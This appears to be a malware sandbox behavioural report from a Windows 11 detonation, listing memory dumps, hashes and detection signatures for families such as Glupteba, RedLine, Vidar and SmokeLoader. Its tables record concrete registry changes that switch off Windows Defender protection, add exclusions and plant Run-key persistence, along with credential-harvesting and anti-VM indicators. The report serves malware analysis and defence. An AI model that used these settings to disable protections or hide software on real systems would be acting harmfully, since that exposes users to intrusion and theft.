| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
memory/3952-328-0x0000000003FE0000-0x000000000407D000-memory.dmp
memory/2636-327-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1500-332-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1500-325-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\Pn1VVo1T_hse7zpU6N5O7Ppu.exe
| MD5 | 99f9746aed8955dcabe487429ee1f1b2 |
| SHA1 | cf146a760cef73b60ec3b9595084b56dd576e98d |
| SHA256 | b3d3be5bddf3fb8c4c8eac161b4e1f584713e8b563de3f13a5a42781a0a7f26e |
| SHA512 | 0e0ccf3304eb9c827e78802c265eb93b70c74df1221fad816205b9ca15453d79f58ce3e36b5b4c191b1e92afd016b26829f8d961f63aa47a734da3d80db6688b |
memory/5012-333-0x00000000025F0000-0x000000000261F000-memory.dmp
memory/4548-336-0x0000000003410000-0x0000000003411000-memory.dmp
memory/1052-340-0x0000000004070000-0x0000000004079000-memory.dmp
memory/2736-344-0x00000000025D0000-0x00000000025E9000-memory.dmp
memory/912-351-0x00000000050D0000-0x00000000056E8000-memory.dmp
memory/2236-358-0x0000000002570000-0x000000000259F000-memory.dmp
memory/1188-355-0x00000000040B0000-0x00000000040E0000-memory.dmp
memory/4056-362-0x00000000025E0000-0x0000000002610000-memory.dmp
memory/2636-371-0x0000000005880000-0x0000000005E98000-memory.dmp
memory/1112-366-0x00000000057C0000-0x00000000057C1000-memory.dmp
memory/1556-373-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/1300-380-0x0000000000000000-mapping.dmp
memory/1912-378-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
memory/1912-375-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/1912-386-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
memory/1912-384-0x0000000005AC0000-0x0000000005AC1000-memory.dmp
memory/3236-385-0x0000000000000000-mapping.dmp
memory/1912-382-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
memory/3256-389-0x00000000042B0000-0x00000000042C6000-memory.dmp
memory/1912-396-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
memory/1540-401-0x0000000000000000-mapping.dmp
memory/1912-400-0x0000000005B00000-0x0000000005B01000-memory.dmp
memory/3244-399-0x0000000000000000-mapping.dmp
memory/5116-397-0x0000000000000000-mapping.dmp
memory/4572-395-0x0000000000000000-mapping.dmp
memory/1912-393-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
memory/1912-409-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/1912-404-0x0000000005B10000-0x0000000005B11000-memory.dmp
memory/1912-416-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/1912-423-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/4920-424-0x0000000000000000-mapping.dmp
memory/3840-422-0x0000000000000000-mapping.dmp
memory/1912-419-0x0000000005B50000-0x0000000005B51000-memory.dmp
memory/1300-414-0x000000001B760000-0x000000001B762000-memory.dmp
memory/4704-413-0x0000000000000000-mapping.dmp
memory/1912-411-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/680-443-0x00000000049A0000-0x00000000052C6000-memory.dmp
memory/3236-439-0x0000000005440000-0x00000000059E6000-memory.dmp
memory/2820-445-0x0000000004320000-0x0000000004425000-memory.dmp
memory/5116-454-0x00000000054F0000-0x0000000005B08000-memory.dmp
memory/4340-452-0x0000000000000000-mapping.dmp
memory/2484-451-0x0000000000000000-mapping.dmp
memory/5244-465-0x0000000000000000-mapping.dmp
memory/5304-467-0x0000000000000000-mapping.dmp
memory/5504-478-0x0000000000000000-mapping.dmp
memory/5244-474-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5592-484-0x0000000000000000-mapping.dmp
memory/5576-483-0x0000000000000000-mapping.dmp
memory/1540-487-0x0000000002550000-0x0000000002551000-memory.dmp
memory/5420-482-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5360-480-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4704-471-0x0000000004BE0000-0x0000000004BE1000-memory.dmp
memory/5420-473-0x0000000000000000-mapping.dmp
memory/5360-470-0x0000000000000000-mapping.dmp
memory/5188-461-0x0000000000000000-mapping.dmp
memory/5744-488-0x0000000000000000-mapping.dmp
memory/5760-494-0x0000000000000000-mapping.dmp
memory/2832-490-0x000000001B5B2000-0x000000001B5B4000-memory.dmp
memory/5744-498-0x0000000000400000-0x000000000046D000-memory.dmp
memory/5152-497-0x0000000000000000-mapping.dmp
memory/6016-496-0x0000000000000000-mapping.dmp
memory/5548-507-0x0000000000000000-mapping.dmp
memory/5592-508-0x00000000033F0000-0x00000000033F1000-memory.dmp
memory/5592-504-0x00000000033E0000-0x00000000033E1000-memory.dmp
memory/6016-500-0x00000000020A0000-0x00000000020A1000-memory.dmp
memory/5344-502-0x0000000000000000-mapping.dmp
memory/4968-509-0x0000000000000000-mapping.dmp
memory/5344-510-0x0000000002200000-0x0000000002201000-memory.dmp
memory/5592-516-0x0000000003400000-0x0000000003401000-memory.dmp
memory/5116-512-0x000000007F5D0000-0x000000007F5D1000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
463s
Max time network
1794s
Command Line
Signatures
Buran
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 6108 created 6660 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\AdvancedRun.exe |
| PID 6108 created 6660 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\AdvancedRun.exe |
Turns off Windows Defender SpyNet reporting
Vidar
Windows security bypass
Checks for common network interception software
Deletes shadow copies
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-591GI.tmp\3377047_logo_media.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\SET1072.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\drivers\SET1072.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
Executes dropped EXE
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\K8Hno9wMPq_SEtOmqzSO0cTe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\OuoC3LfzUwkBoMEu2wptPjMS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\BE1F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\DB_GbXPWmdYLlmz8y4_YoGg2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\Vu8JiHzoy_VQzkYrueDnKkdL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\99BD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\3C6A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\CKtgFsvgxGFhRN5JLRlsBLTG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\71B2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\E280.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\DB_GbXPWmdYLlmz8y4_YoGg2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\lzcc5otmRQiivUWGxRQNmSXt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\lzcc5otmRQiivUWGxRQNmSXt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\K8Hno9wMPq_SEtOmqzSO0cTe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\Vu8JiHzoy_VQzkYrueDnKkdL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\E280.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\71B2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\3C6A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\CKtgFsvgxGFhRN5JLRlsBLTG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\99BD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\BE1F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\OuoC3LfzUwkBoMEu2wptPjMS.exe | N/A |
Loads dropped DLL
Reads local data of messenger clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1912.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Company\\Coducegoro.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-591GI.tmp\3377047_logo_media.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\7159434.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\703E.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\smss.exe\" -start" | C:\Users\Admin\AppData\Local\Temp\703E.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\DB_GbXPWmdYLlmz8y4_YoGg2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\Vu8JiHzoy_VQzkYrueDnKkdL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\lzcc5otmRQiivUWGxRQNmSXt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\71B2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\OuoC3LfzUwkBoMEu2wptPjMS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\E280.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\3C6A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\CKtgFsvgxGFhRN5JLRlsBLTG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\K8Hno9wMPq_SEtOmqzSO0cTe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\99BD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\BE1F.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | N/A | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | geoiptool.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | C:\Windows\System32\Conhost.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\oemvista.inf | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD78.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD79.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD67.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD67.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\tap0901.cat | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD78.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD79.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\tap0901.sys | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2105.41472.0_x64__8wekyb3d8bbwe\Assets\contrast-white\GetHelpAppList.targetsize-30_altform-lightunplated_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_KMS_Client-ul.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\powerpoint.x-none.msi.16.x-none.tree.dat.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.11591.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-16_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Xbox_AppList.scale-100_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Assets\Graphing.targetsize-16_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Outlook.scale-125.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\KeytipLayer.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessR_OEM_Perp-ul-phn.xrm-ms.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL083.XML.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Todos_0.33.33351.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2106.12410.0_x64__8wekyb3d8bbwe\Images\SplashScreen.scale-200.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\AppCS\Assets\StoryBuilder\CreatingMovieAnimation\LOOP_300px\LOOP_300px.34.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.2aaf2291.pri | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
